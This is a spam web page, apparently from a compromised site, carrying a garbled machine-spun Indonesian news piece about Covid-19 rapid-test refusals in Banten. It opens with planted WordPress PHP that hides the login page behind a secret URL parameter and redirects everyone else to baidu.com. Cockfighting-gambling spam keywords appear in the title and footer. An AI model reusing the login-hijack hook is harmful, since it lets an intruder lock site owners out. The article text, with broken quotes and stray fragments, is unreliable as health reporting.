//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Penolakan warga Kota Banten dengan berbagai alasan.Ini Penjelasan Gugas dan Kapuskesad Terkait Tes Cepat | adu ayam bali_s128.net login_s128.live

Penolakan warga Kota Banten dengan berbagai alasan.Ini Penjelasan Gugas dan Kapuskesad Terkait Tes Cepat

Jakarta TRIBUNNEWS.COM-Covid-19 Management Acceleration Working Group memaparkan tujuan dari rapid test Covid-19.

Hal ini terkait dengan kejadian di Banten. Warga sejumlah wilayah di kawasan itu menolak permintaan uji cepat Covid-19. Jumlah alasan. — Profesor Wiku Adisasmito, tim ahli dari Central Working Group, mengatakan bahwa tujuan tes cepat adalah untuk menyaring untuk memastikan bahwa orang-orang yang berhubungan dekat dengan Covid-19 terinfeksi dan sebaliknya. -Wiku mengatakan dalam siaran BNPB, Jumat (19/6/2020): “Jika hasilnya negatif maka akan menjadi 7 sampai 10. Ulangi keesokan harinya. Karena tujuannya untuk menyaring, belum semua orang diuji . “- Jika orang yang dites menerima hasil positif sedini mungkin, mereka akan melakukan hal yang berbeda. Wiku mengatakan akan menggunakan polymerase chain reaction (PCR) untuk pengujian lebih lanjut.

Baca: Wakil Gubernur Banten Tolak Tes Cepat: Kalau Hasil Covid-19 Positif Tidak Bisa Terima

Positif, Biasanya “sudah ada gejala, harus ditangani otomatis. Kalau PCR Kalau negatif berarti tidak ada virus. Namun untuk menunggu hasil dikarantina bisa mandiri di rumah, atau ada tempat umum untuk mengisolasi mereka, ”lanjut Wiku. -Wiku juga menanyakan kepada masyarakat apakah mereka melakukan quick test dan hasilnya negatif, tapi di satu sisi ada gejala dan sebaiknya ke dokter. Jangan langsung panik dan menyimpulkan bahwa Anda telah terjangkit virus corona. Tugas Mayor Jenderal TNI Dr. Ratmono dari Pusat Kesehatan Angkatan Darat (Kapuskesad) adalah menjelaskan kemungkinan positif Covid-19 setelah melalui serangkaian tes termasuk rapid test dan PCR. 22 of 1110 “, task .

” Kemudian kami melakukan pemeriksaan PCR reaktif. Hasil positif PCR hanya 3 orang, ”lanjutnya.

Leave a comment

adu ayam bali_s128.net login_s128.live